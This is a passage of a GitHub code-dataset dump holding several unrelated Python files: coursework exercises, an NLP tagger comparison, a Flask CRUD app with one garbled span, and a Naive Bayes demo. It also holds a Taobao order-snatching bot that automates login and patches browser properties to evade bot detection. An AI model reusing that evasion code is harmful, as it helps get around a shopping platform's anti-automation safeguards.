low_guess) // 2) + low_guess\n mid_savings = savings(starting_salary, mid_guess/10000)\n \n if (mid_savings < savings_needed):\n low_guess = mid_guess\n \n if (mid_savings > savings_needed):\n high_guess = mid_guess \n \n print(\"Best savings rate: \", mid_guess/10000)\n print(\"Steps in bisection search: \", steps)\n\n \ndef savings(annual_salary=0, portion_saved=0):\n current_savings = 0\n for month in range(0, MONTHS):\n current_savings += (annual_salary / 12.0) * portion_saved\n current_savings += current_savings * R / 12.0\n if (month % 6 == 0):\n annual_salary += annual_salary * SEMI_ANNUAL_RAISE\n \n return current_savings","repo_name":"akgill/MIT6_0001","sub_path":"PS1/ps1c.py","file_name":"ps1c.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12652413289","text":"#тегсет Universal Dependencies, так как многие теггеры используют именно его. Текст в основном использует много межчастеречных омонимов.\r\n#шаблоны словосочетаний: 1) не + ADJ/ADV/VERB, так как это меняет смысл на антонимичный \"не включается\"/\"не производительный\"; 2) ADV + ADJ, зачастую \r\n#меняет смысл слов (чаще ADV) в словосочетаниях типа \"ужасно интересный\" и так далее, тоже несочетается с основной семантикой слова \"ужасно\";\r\n#3) ADJ + NOUN, выделить какие-то характеристики товара, типа \"хорошая автономность\", можно в перспективе понять, какие характеристики весят больше при выборе товара \r\n#и им предавать больший вес при определении тональности отзыва (то есть плохой цвет корпуса, например, будет меньше весить, чем плохой аккумулятор\r\n\r\nimport re\r\nfrom collections import OrderedDict\r\nfrom natasha import (Segmenter,\r\n NewsMorphTagger, NewsEmbedding,\r\n Doc)\r\nimport spacy\r\nfrom sklearn.metrics import accuracy_score\r\nimport pymorphy2\r\n\r\nmorph = pymorphy2.MorphAnalyzer()\r\n\r\nnlp = spacy.load(\"ru_core_news_sm\")\r\n\r\npos_FROM_P = {'NPRO': 'PRON', 'ADVB': 'ADV', 'PRED': 'ADV', 'VERB': 'VERB', 'PNCT': 'PUNCT', 'NOUN': 'NOUN',\r\n 'PREP': 'ADP', 'INFN': 'VERB', 'GRND': 'VERB', 'PRCL': 'PART', 'ADJF': 'ADJ', 'ADJS': 'ADJ',\r\n 'COMP': 'ADJ', 'CONJ': 'CCONJ', 'UNKN': 'X', 'NUMR': 'NUM', 'PRTF': 'VERB'}\r\n\r\n\r\ndef acc(dictio, name):\r\n a = []\r\n b = []\r\n for i in gold.keys():\r\n a.append(gold[i])\r\n b.append(dictio[i])\r\n\r\n print('Accuracy для ' + name + ': ' + str(accuracy_score(b, a)) + '%')\r\n return 0\r\n\r\n\r\nsegmenter = Segmenter()\r\nmorph_tagger = NewsMorphTagger(NewsEmbedding())\r\n\r\ngold = OrderedDict()\r\nslovne = OrderedDict()\r\n\r\nwith open('корпус.txt', 'r', encoding='utf-8') as f:\r\n text = f.read()\r\n\r\nwith open('gold.txt', 'r', encoding='utf-8') as f:\r\n for line in f:\r\n x = re.split('___', re.sub('\\n', '', line))\r\n gold[x[0]] = x[1]\r\n\r\ndoc = Doc(text)\r\ndoc.segment(segmenter)\r\ndoc.tag_morph(morph_tagger)\r\n\r\nfor i in doc.tokens:\r\n x = re.search(\"text='.+?'\", str(i)).group(0)\r\n x = re.sub(\"text='\", '', x)\r\n x = re.sub(\"'\", '', x)\r\n x = x.lower()\r\n y = re.search(\"pos='.+?'\", str(i)).group(0)\r\n y = re.sub(\"pos='\", '', y)\r\n y = re.sub(\"'\", '', y)\r\n slovne[x] = y\r\n\r\nacc(slovne, 'Slovnet')\r\n\r\ndoc = nlp(text)\r\n\r\nspac = OrderedDict()\r\nfor i, s in enumerate(doc.sents): # делит по дефису, фиксим как-то\r\n for t in s:\r\n if t.pos_ != 'SPACE' and t.text != 'какой':\r\n spac[t.text.lower()] = t.pos_\r\n else:\r\n spac['какой-то'] = 'DET'\r\n\r\nacc(spac, 'spaCy')\r\n\r\nwith open('леммы.txt', 'r', encoding='utf-8') as f:\r\n lemma = f.read()\r\n lemmas = lemma.split('\\n')\r\n\r\npymorph = OrderedDict()\r\nfor l in lemmas:\r\n p = morph.parse(l)[0]\r\n if str(p.tag) != 'PNCT':\r\n pymorph[l] = pos_FROM_P[str(p.tag.POS)]\r\n else:\r\n pymorph[l] = pos_FROM_P[str(p.tag)]\r\n\r\na = []\r\nb = []\r\nfor i in gold.keys():\r\n a.append(gold[i])\r\n b.append(pymorph[i])\r\n\r\nacc(pymorph, 'pymorphy2')\r\n","repo_name":"segherz/NLP-hw","sub_path":"3rd year/hw-2.py","file_name":"hw-2.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25599859320","text":"#app/__init__.py\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_api import FlaskAPI\nfrom flask import request, jsonify, abort\nfrom instance.config import app_config\n\n# initialize sql-alchemy\ndb = SQLAlchemy()\n\n#config name refer to development, staging, testing, production\ndef crud_app(config_name): \n\n from app.models import Userlist\n\n # run app based on config environment\n app = FlaskAPI(__name__, instance_relative_config=True)\n app.config.from_object(app_config[config_name])\n app.config.from_pyfile('config.py')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n \n #validate duplicate\n def validate(name, email):\n userlists = Userlist.get_all()\n results = []\n\n for userlist in userlists:\n obj = {\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n }\n results.append(obj)\n i = 0\n while i', methods=['GET', 'PUT', 'DELETE'])\n def userlists_edit(id, *kwargs):\n #get userlist using its ID\n userlist= Userlist.query.filter_by(id=id).first()\n if not userlist:\n abort(404)\n \n if request.method == 'DELETE':\n userlist.delete()\n return {\n \"message\": \"user {} deleted successfully\".format(userlist.id)\n }, 200\n\n elif request.method == 'PUT':\n \n name = str(request.data.get('name', ''))\n email = str(request.data.get('email', ''))\n if validate(name, email) != True:\n userlist.name = name\n userlist.email = email\n userlist.save()\n response = jsonify({\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n })\n response.status_code = 200\n return response\n else:\n return {\n \"message\": \"user already exist\"\n }, 200\n else:\n response = jsonify({\n 'id': userlist.id,\n 'name': userlist.name,\n 'email': userlist.email,\n 'date_created': userlist.date_created,\n 'date_modified': userlist.date_modified\n })\n response.status_code = 200\n return response\n return app\n\n\n \n \n","repo_name":"rajanazirul/flask-CRUD","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39188690163","text":"import keyboard\nimport time\nimport pyautogui\nimport cv2\nimport numpy as np\nimport winsound\n\ndef is_image_on_screen(template_path):\n # Load the image template you want to search for\n template = cv2.imread(template_path, cv2.IMREAD_GRAYSCALE)\n\n # Take a screenshot of the screen\n screenshot = pyautogui.screenshot()\n\n # Convert the screenshot to a NumPy array\n screenshot = np.array(screenshot)\n\n # Convert the screenshot to grayscale\n screenshot_gray = cv2.cvtColor(screenshot, cv2.COLOR_RGB2GRAY)\n\n # Search for the template within the screenshot\n result = cv2.matchTemplate(screenshot_gray, template, cv2.TM_CCOEFF_NORMED)\n\n # Set a threshold to determine if the template was found\n threshold = 0.8\n location = np.where(result >= threshold)\n\n # If the template was found, return True\n if len(location[0]) > 0:\n return True\n else:\n return False\n\n\ndef has_passed_n_seconds(n, last_time):\n return time.time() - last_time > n\n\n\ndef main():\n\n time_between_beeps = 15 # seconds\n\n hotkey_to_pause_resume = '-'\n\n hotkey_to_quit = '='\n \n # Path to the image template you want to search for\n image = 'photo.png'\n image2 = 'photo2.png'\n\n paused = False\n\n last_beep_time = time.time()\n\n\n print(f\"start\\npress {hotkey_to_pause_resume} to pause\\npress {hotkey_to_quit} to quit\")\n winsound.Beep(660, 200)\n\n while True: # making a loop\n try: # used try so that if user pressed other than the given key error will not be shown\n if keyboard.is_pressed(hotkey_to_pause_resume): # if key 'q' is pressed \n paused = not paused\n if paused:\n print('Paused')\n winsound.Beep(660, 200)\n else:\n print('Resumed')\n winsound.Beep(660, 200)\n last_beep_time = time.time() # reset last beep time\n time.sleep(0.2)\n \n if keyboard.is_pressed(hotkey_to_quit): \n print('Quit')\n winsound.Beep(880, 300)\n break \n \n if not paused and has_passed_n_seconds(time_between_beeps, last_beep_time) and not is_image_on_screen(image) and not is_image_on_screen(image2):\n # winsound.Beep(660, 400)\n winsound.PlaySound(\"make_vils.wav\", winsound.SND_FILENAME)\n print(\"make villagers\")\n last_beep_time = time.time()\n\n except:\n break\n\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TheMarcosP/vills_warning_script","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25643652463","text":"users = {\n \"Jonathan\": {\n \"twitter\": \"jonnyt\",\n \"lottery_numbers\": [6, 12, 49, 33, 45, 20],\n \"home_town\": \"Stirling\",\n \"pets\": [\n {\n \"name\": \"fluffy\",\n \"species\": \"cat\"\n },\n {\n \"name\": \"fido\",\n \"species\": \"dog\"\n },\n {\n \"name\": \"spike\",\n \"species\": \"dog\"\n }\n ]\n },\n \"Erik\": {\n \"twitter\": \"eriksf\",\n \"lottery_numbers\": [18, 34, 8, 11, 24],\n \"home_town\": \"Linlithgow\",\n \"pets\": [\n {\n \"name\": \"nemo\",\n \"species\": \"fish\"\n },\n {\n \"name\": \"kevin\",\n \"species\": \"fish\"\n },\n {\n \"name\": \"spike\",\n \"species\": \"dog\"\n },\n {\n \"name\": \"rupert\",\n \"species\": \"parrot\"\n }\n ]\n },\n \"Avril\": {\n \"twitter\": \"bridgpally\",\n \"lottery_numbers\": [12, 14, 33, 38, 9, 25],\n \"home_town\": \"Dunbar\",\n \"pets\": [\n {\n \"name\": \"monty\",\n \"species\": \"snake\"\n }\n ]\n }\n}\n\n# 1. Get Jonathan's Twitter handle (i.e. the string `\"jonnyt\"`)\n# 2. Get Erik's hometown\n# 3. Get the array of Erik's lottery numbers\n# 4. Get the species of Avril's pet Monty\n# 5. Get the smallest of Erik's lottery numbers\n# 6. Return an array of Avril's lottery numbers that are even\n# 7. Erik is one lottery number short! Add the number `7` to be included in his lottery numbers\n# 8. Change Erik's hometown to Edinburgh\n# 9. Add a pet dog to Erik called \"Fluffy\"\n# 10. Add another person to the users dictionary\n\nprint(\"\\n\")\nprint(\"Jonathans twitter is: \", users[\"Jonathan\"][\"twitter\"]) # prints Jonathans twitter handle\n\nprint(\"Erik's hometown is: \", users[\"Erik\"][\"home_town\"]) # prints Erik's hometown\n\nprint(\"Erik's Lotto numbers are: \", users[\"Erik\"][\"lottery_numbers\"]) # prints Eriks Lottery numbers\n\navrilPet = users[\"Avril\"][\"pets\"][0][\"species\"] # stores the species of avrilsPet in a new variable\nprint(\"Avrils pet is a: \", avrilPet, \"\\n\") # and prints it\n\nerikLottoList = users[\"Erik\"][\"lottery_numbers\"] # initialises new List containing Eriks lottery no's.\nprint(\"Lowest number in Erik's numbers is: \", min(erikLottoList), \"\\n\") # and prints the lowest number.\n\navrilLottoList = users[\"Avril\"][\"lottery_numbers\"] # initialises new List containing Avrils lottery no's.\navrilEven = [] # initialises empty List \nfor num in avrilLottoList: \n if num % 2 == 0: # for all the items in avrils lottery numbers, IF they divide by 2 with no remainder --\n avrilEven.append(num) # They are EVEN. if they are EVEN they are added to the empty List from before.\nprint(\"Avrils EVEN lotto numbers: \", avrilEven, '\\n') # new List is then printed\n\nerikLottoList.append(7) # add no. 7 to Eriks numbers.\nprint(\"Erik has added a number: \", erikLottoList, \"\\n\")\n\nerikHome = users[\"Erik\"][\"hometown\"] = \"Edinburgh\" # new variable = Eriks hometown, which is also being reset to 'Edinburgh'\nprint(\"Erik's new hometown is: \", erikHome, \"\\n\") # new variable then printed\n\nerikPet = users[\"Erik\"][\"pets\"] # new List containing Erik's pets\nerikPet.append({\"name\":\"Fluffy\", \"species\":\"dog\"}) # adding new pet to dictionary within a list within a dictionary within a list within.........\nprint(\"Erik's pets with newly added DOG: \", erikPet, \"\\n\") # Print List of pets to show newly added Dog.\n\nusers[\"Sam\"] = {\"twitter\":\"samS\", \"lottery_numbers\":[1,2,3,4,5,6,7], \"home_town\":\"Linlithgow\", \"pets\":[{\"name\":\"leia\", \"species\":\"dog\"}]}\nfor key, value in users.items() :\n if key == \"Sam\": # new user added above here, all in one line. could be more elegant!\n print (\"New user added: \", key, value) # loop with conditional used to select the new user by KEY then display all values within.\n\n\n\n\n","repo_name":"TeddyBuckshot/day2Homework","sub_path":"exercise_b_users.py","file_name":"exercise_b_users.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2873267896","text":"from functools import reduce\r\n\r\nimport pandas as pd\r\nimport pprint\r\n\r\nclass Classifier():\r\n data = None\r\n class_attr = None\r\n priori = {}\r\n cp = {}\r\n hypothesis = None\r\n\r\n\r\n def __init__(self,filename=None, class_attr=None ):\r\n self.data = pd.read_csv(filename, sep=',', header =(0))\r\n self.class_attr = class_attr\r\n\r\n '''\r\n probability(class) = How many times it appears in cloumn\r\n __________________________________________\r\n count of all class attribute\r\n '''\r\n def calculate_priori(self):\r\n class_values = list(set(self.data[self.class_attr]))\r\n class_data = list(self.data[self.class_attr])\r\n for i in class_values:\r\n self.priori[i] = class_data.count(i)/float(len(class_data))\r\n print (\"Priori Values: \", self.priori)\r\n\r\n '''\r\n Here we calculate the individual probabilites \r\n P(outcome|evidence) = P(Likelihood of Evidence) x Prior prob of outcome\r\n ___________________________________________\r\n P(Evidence)\r\n '''\r\n def get_cp(self, attr, attr_type, class_value):\r\n data_attr = list(self.data[attr])\r\n class_data = list(self.data[self.class_attr])\r\n total =1\r\n for i in range(0, len(data_attr)):\r\n if class_data[i] == class_value and data_attr[i] == attr_type:\r\n total+=1\r\n return total/float(class_data.count(class_value))\r\n\r\n '''\r\n Here we calculate Likelihood of Evidence and multiple all individual probabilities with priori\r\n (Outcome|Multiple Evidence) = P(Evidence1|Outcome) x P(Evidence2|outcome) x ... x P(EvidenceN|outcome) x P(Outcome)\r\n scaled by P(Multiple Evidence)\r\n '''\r\n def calculate_conditional_probabilities(self, hypothesis):\r\n for i in self.priori:\r\n self.cp[i] = {}\r\n for j in hypothesis:\r\n self.cp[i].update({ hypothesis[j]: self.get_cp(j, hypothesis[j], i)})\r\n print (\"\\nCalculated Conditional Probabilities: \\n\")\r\n pprint.pprint(self.cp)\r\n\r\n def classify(self):\r\n print (\"Result: \")\r\n for i in self.cp:\r\n print (i, \" ==> \", reduce(lambda x, y: x*y, self.cp[i].values())*self.priori[i])\r\n\r\nif __name__ == \"__main__\":\r\n c = Classifier(filename=\"new_dataset.csv\", class_attr=\"Play\" )\r\n c.calculate_priori()\r\n c.hypothesis = {\"Outlook\":'Rainy', \"Temp\":\"Mild\", \"Humidity\":'Normal' , \"Windy\":'t'}\r\n\r\n c.calculate_conditional_probabilities(c.hypothesis)\r\n c.classify()\r\n","repo_name":"husnainfareed/Simple-Naive-Bayes-Weather-Prediction","sub_path":"bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"11470480926","text":"# coding=utf-8\n\nimport asyncio\nimport json\nimport re\nimport time\nfrom datetime import datetime, timedelta\n\nimport execjs\nimport requests\nfrom pyppeteer import launch\n\nfrom conf import buy_time, cart_id, cookies_duration, pw, user\n\nbuy_time = datetime.strptime(buy_time, \"%Y-%m-%d %H:%M:%S.%f\")\n\n\ns = requests.Session()\n\n\n# TODO cookies检测失效后再次获取,自动获取cart_id\nasync def get_cookies():\n with open(\"./cookies.json\", \"r\") as f:\n obj = json.load(f)\n ct = datetime.strptime(obj[\"create_time\"], \"%Y-%m-%d %H:%M:%S.%f\")\n if datetime.now() - ct < timedelta(minutes=cookies_duration) and user == obj[\"cookies\"].get(\"tracknick\"):\n return obj[\"cookies\"]\n else:\n try:\n launch_args = {\n \"headless\": False, # 无头\n \"dumpio\": True, # 避免卡死\n # 浏览器窗口大小,禁用提示条\n \"args\": [\"--windows-size=800,1280\", \"--disable-infobars\"]\n }\n driver = await launch(launch_args)\n page = await driver.newPage()\n await page.setUserAgent(\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\")\n await page.setViewport(viewport={\"width\": 462, \"height\": 824})\n\n # 修改浏览器属性值,防止被检测是爬虫\n await page.evaluateOnNewDocument(\"() => { Object.defineProperties(navigator, { webdriver: { get: () => false }})}\")\n await page.evaluateOnNewDocument(\"() => { Object.defineProperty(navigator, 'plugins', { get: () => []})}\")\n await page.evaluateOnNewDocument(\"() => { Object.defineProperty(navigator, 'languages', { get: () => ['zh-CN', 'zh']})}\")\n\n await page.goto(\"https://main.m.taobao.com/cart/index.html?\")\n await page.waitFor(\"iframe\")\n iframe = page.frames[1]\n await iframe.type(\"#username\", user, {\"delay\": 100})\n await iframe.type(\"#password\", pw, {\"delay\": 100})\n await iframe.click(\"#btn-submit\")\n await iframe.waitFor(2000)\n\n # 判断是否出现验证\n # vs = await iframe.Jeval(\"div.km-dialog.km-dialog-ios7.km-dialog-alert\", \"node => node.style.visibility\")\n # if vs == \"visible\":\n # await iframe.click(\"div.km-dialog.km-dialog-ios7.km-dialog-alert > div.km-dialog-buttons > span\")\n # await iframe.click(\"#SM_BTN_1\")\n # await iframe.type(\"#password\", pw, {\"delay\": 100})\n # await iframe.click(\"#btn-submit\")\n # 等待指定元素\n await page.waitFor(\"#cart_sticky_fixed_bar\")\n cookies = await page.cookies()\n cookies = {c[\"name\"]: c[\"value\"] for c in cookies}\n await driver.close()\n with open(\"./cookies.json\", \"w\") as f:\n obj = {\"create_time\": datetime.now().strftime(\n \"%Y-%m-%d %H:%M:%S.%f\"), \"cookies\": cookies}\n json.dump(obj, f, ensure_ascii=False, indent=4)\n return cookies\n except Exception as e:\n print(e)\n await driver.close()\n raise\n\n\ndef main(cookies):\n # 抢单\n try:\n # 忽略安全警告\n requests.packages.urllib3.disable_warnings()\n # 添加cookies等配置\n cj = requests.utils.cookiejar_from_dict(\n cookies, cookiejar=None, overwrite=True)\n s.cookies = cj\n s.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n s.verify = False\n\n token = cookies[\"_m_h5_tk\"].split(\"_\")[0]\n with open('./s.js') as f:\n js = f.read()\n context = execjs.compile(js)\n # 还剩30秒时,获取一些参数\n order_build_data = None\n while True:\n now = datetime.now()\n if buy_time - now <= timedelta(seconds=30):\n try:\n source_time = str(int(round(time.time(), 3) * 1000))\n data = '{\"isPage\":True,\"extStatus\":0,\"netType\":0,\"exParams\":\"{\\\\\"mergeCombo\\\\\":\\\\\"True\\\\\",\\\\\"version\\\\\":\\\\\"1.1.1\\\\\",\\\\\"globalSell\\\\\":\\\\\"1\\\\\",\\\\\"cartFrom\\\\\":\\\\\"taobao_client\\\\\",\\\\\"spm\\\\\":\\\\\"a2141.7756461.toolbar.i1\\\\\",\\\\\"dataformat\\\\\":\\\\\"dataformat_ultron_h5\\\\\"}\",\"cartFrom\":\"taobao_client\",\"spm\":\"a2141.7756461.toolbar.i1\",\"dataformat\":\"dataformat_ultron_h5\",\"ttid\":\"h5\"}'\n req = s.get(\"https://h5api.m.taobao.com/h5/mtop.trade.query.bag/5.0/?jsv=2.5.6&appKey=12574478&t=%s&sign=%s&api=mtop.trade.query.bag&v=5.0&type=jsonp&ttid=h5&isSec=0&ecode=1&AntiFlood=True&AntiCreep=True&H5Request=True&dataType=jsonp&callback=mtopjsonp2&data=%s\" %\n (source_time, context.call(\"s\", token + \"&\" + source_time + \"&12574478&\" + data), data))\n query_bag_data = json.loads(\n re.match(\".*?({.*}).*\", req.text, re.S).group(1))[\"data\"]\n # 防止请求过快\n time.sleep(5)\n source_time = str(int(round(time.time(), 3) * 1000))\n data = '{\"buyNow\":\"false\",\"buyParam\":\"%s\",\"spm\":\"a21202.12579950.settlement-bar.0\",\"exParams\":\"{\\\\\"tradeProtocolFeatures\\\\\":\\\\\"5\\\\\",\\\\\"userAgent\\\\\":\\\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\\\\\"}\"}' % query_bag_data[\n \"data\"][\"item_\" + cart_id][\"fields\"][\"settlement\"]\n req = s.post(\"https://h5api.m.taobao.com/h5/mtop.trade.order.build.h5/4.0/?jsv=2.5.7&appKey=12574478&t=%s&sign=%s&api=mtop.trade.order.build.h5&v=4.0&type=originaljson&ttid=%s&isSec=1&ecode=1&AntiFlood=True&AntiCreep=True&H5Request=True&dataType=jsonp\" %\n (source_time, context.call(\"s\", token + \"&\" + source_time + \"&12574478&\" + data), \"%23t%23ip%23%23_h5_2019\"), data={\"data\": data})\n order_build_data = req.json()[\"data\"]\n break\n except Exception:\n raise\n # 抢单\n submitref = order_build_data[\"global\"][\"secretValue\"]\n # 这些参数都是根据order_build_data顺序排序的\n data = '{\"params\":\"{\\\\\"data\\\\\":\\\\\"{'\n keys = [\"itemInfo_\", \"item_\", \"invoice_\", \"promotion_\", \"deliveryMethod_\", \"anonymous_\",\n \"voucher_\", \"confirmOrder_\", \"service_yfx_\", \"ncCheckCode_\", \"memo_\", \"address_\", \"submitOrder_\"]\n for k in order_build_data[\"data\"]:\n for _k in keys:\n if _k in k:\n item = order_build_data[\"data\"][k]\n if _k == \"service_yfx_\":\n item.update(\n {\"id\": k.split(\"service_\")[1], \"tag\": \"service\"})\n else:\n item.update(\n {\"id\": k.split(\"_\")[1], \"tag\": k.split(\"_\")[0]})\n if _k in (\"voucher_\", \"address_\"):\n item[\"fields\"][\"cornerType\"] = \"both\"\n item_dict = json.dumps(item, ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n if _k in (\"address_\", ):\n item_dict = item_dict.replace(\n r'\\\\\\\\\\\\\\\\\\\"', r'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"')\n data += '\\\\\\\\\\\\\"%s\\\\\\\\\\\\\":%s,' % (k, item_dict)\n data = data[:-1] + '}\\\\\",'\n\n linkage = {\"common\": {}, \"signature\": \"\"}\n linkage[\"common\"][\"compress\"] = order_build_data[\"linkage\"][\"common\"][\"compress\"]\n linkage[\"common\"][\"submitParams\"] = order_build_data[\"linkage\"][\"common\"][\"submitParams\"]\n linkage[\"common\"][\"validateParams\"] = order_build_data[\"linkage\"][\"common\"][\"validateParams\"]\n linkage[\"signature\"] = order_build_data[\"linkage\"][\"signature\"]\n linkage_dict = json.dumps(linkage, ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n hierarchy_structure_dict = json.dumps(order_build_data[\"hierarchy\"][\"structure\"], ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n endpoint_dict = json.dumps(order_build_data[\"endpoint\"], ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n\n data += '\\\\\"linkage\\\\\":\\\\\"%s\\\\\",\\\\\"hierarchy\\\\\":\\\\\"{\\\\\\\\\\\\\"structure\\\\\\\\\\\\\":%s}\\\\\",\\\\\"endpoint\\\\\":\\\\\"%s\\\\\"}\"}' % (\n linkage_dict, hierarchy_structure_dict, endpoint_dict)\n\n source_time = str(int(buy_time.timestamp()) * 1000)\n sign = context.call(\"s\", token + \"&\" +\n source_time + \"&12574478&\" + data)\n while True:\n now = datetime.now()\n if now >= buy_time:\n try:\n req = s.post(\"https://h5api.m.taobao.com/h5/mtop.trade.order.create.h5/4.0/?jsv=2.5.7&appKey=12574478&t=%s&sign=%s&v=4.0&post=1&type=originaljson&timeout=15000&dataType=json&isSec=1&ecode=1&api=mtop.trade.order.create.h5&ttid=%s&H5Request=true&submitref=%s\" %\n (source_time, sign, \"%23t%23ip%23%23_h5_2019\", submitref), data={\"data\": data})\n print(\"抢单成功,请去支付\")\n break\n except Exception:\n raise\n except Exception as e:\n print(e)\n raise\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n task = asyncio.ensure_future(get_cookies())\n loop.run_until_complete(task)\n cookies = task.result()\n main(cookies)\n","repo_name":"635547251/boss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19615150015","text":"from datetime import timedelta\n\nfrom apps.parse.readmanga.chapter import ReadmangaChapterSpider\nfrom apps.parse.readmanga.detail import ReadmangaDetailSpider\nfrom apps.parse.readmanga.images import ReadmangaImageSpider\nfrom apps.parse.readmanga.list import ReadmangaListSpider\n\nBASE_UPDATE_FREQUENCY = timedelta(hours=1)\nIMAGE_UPDATE_FREQUENCY = timedelta(hours=8)\n\nLIST_PARSER = \"list\"\nDETAIL_PARSER = \"detail\"\nCHAPTER_PARSER = \"chapters\"\nIMAGE_PARSER = \"images\"\nPARSER_TYPES = [LIST_PARSER, DETAIL_PARSER, CHAPTER_PARSER, IMAGE_PARSER]\n\nCATALOGUES = {\n \"readmanga\": {\n \"source\": \"https://readmanga.io\",\n \"settings\": \"apps.parse.readmanga.settings\",\n \"parsers\": {\n LIST_PARSER: (ReadmangaListSpider, None),\n DETAIL_PARSER: (ReadmangaDetailSpider, 10),\n CHAPTER_PARSER: (ReadmangaChapterSpider, 10),\n IMAGE_PARSER: (ReadmangaImageSpider, 10),\n },\n }\n}\nCATALOGUE_NAMES = [k.lower() for k in CATALOGUES.keys()]\n\nSOURCE_TO_CATALOGUE_MAP = {\n \"https://readmanga.io\": \"readmanga\",\n}\nCATALOGUE_TO_SOURCE_MAP = {v: k for k, v in SOURCE_TO_CATALOGUE_MAP.items()}\n","repo_name":"Sora-reader/backend","sub_path":"apps/parse/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3258231037","text":"import os\nimport cv2\nimport argparse\nimport prettytable as pt\n\nimport metrics as Measure\n\n\ndef evaluator(gt_pth_lst, pred_pth_lst):\n # define measures\n FM = Measure.Fmeasure()\n WFM = Measure.WeightedFmeasure()\n SM = Measure.Smeasure()\n EM = Measure.Emeasure()\n MAE = Measure.MAE()\n\n assert len(gt_pth_lst) == len(pred_pth_lst)\n\n for idx in range(len(gt_pth_lst)):\n gt_pth = gt_pth_lst[idx]\n pred_pth = pred_pth_lst[idx]\n\n pred_pth = pred_pth[:-4] + '.png'\n if os.path.exists(pred_pth):\n pred_ary = cv2.imread(pred_pth, cv2.IMREAD_GRAYSCALE)\n else:\n pred_ary = cv2.imread(pred_pth.replace('.png', '.jpg'), cv2.IMREAD_GRAYSCALE)\n gt_ary = cv2.imread(gt_pth, cv2.IMREAD_GRAYSCALE)\n pred_ary = cv2.resize(pred_ary, (gt_ary.shape[1], gt_ary.shape[0]))\n\n FM.step(pred=pred_ary, gt=gt_ary)\n WFM.step(pred=pred_ary, gt=gt_ary)\n SM.step(pred=pred_ary, gt=gt_ary)\n EM.step(pred=pred_ary, gt=gt_ary)\n MAE.step(pred=pred_ary, gt=gt_ary)\n\n fm = FM.get_results()['fm']\n # Weighted F-measure metric published in CVPR'14 (How to evaluate the foreground maps?)\n wfm = WFM.get_results()['wfm']\n # S-meaure metric published in ICCV'17 (Structure measure: A New Way to Evaluate the Foreground Map.)\n sm = SM.get_results()['sm']\n # E-measure metric published in IJCAI'18 (Enhanced-alignment Measure for Binary Foreground Map Evaluation.)\n em = EM.get_results()['em']\n mae = MAE.get_results()['mae']\n\n return fm, wfm, sm, em, mae\n\n\ndef eval_res(opt, txt_save_path):\n # evaluation for whole dataset\n for _data_name in opt.data_lst:\n # print('#' * 20, _data_name, '#' * 20)\n filename = os.path.join(txt_save_path, '{}_eval.txt'.format(_data_name))\n with open(filename, 'a+') as file_to_write:\n tb = pt.PrettyTable()\n tb.field_names = [\n \"Dataset\", \"Method\", \"maxEm\", \"Smeasure\", \"maxFm\", \"MAE\", \"meanEm\", \"meanFm\",\n \"adpEm\", \"wFmeasure\", \"adpFm\"\n ]\n for _model_name in opt.model_lst:\n gt_src = os.path.join(opt.gt_root, _data_name)\n gt_paths = []\n for ctgr in os.listdir(gt_src):\n for f in os.listdir(os.path.join(gt_src, ctgr)):\n gt_paths.append(os.path.join(gt_src, ctgr, f).replace('\\\\', '/'))\n pred_paths = [p.replace(opt.gt_root, os.path.join(opt.pred_root, _model_name).replace('\\\\', '/')) for p in gt_paths]\n fm, wfm, sm, em, mae = evaluator(\n gt_pth_lst=gt_paths,\n pred_pth_lst=pred_paths\n )\n tb.add_row([\n _data_name, _model_name, em['curve'].max().round(3), sm.round(3), fm['curve'].max().round(3), mae.round(3), em['curve'].mean().round(3), 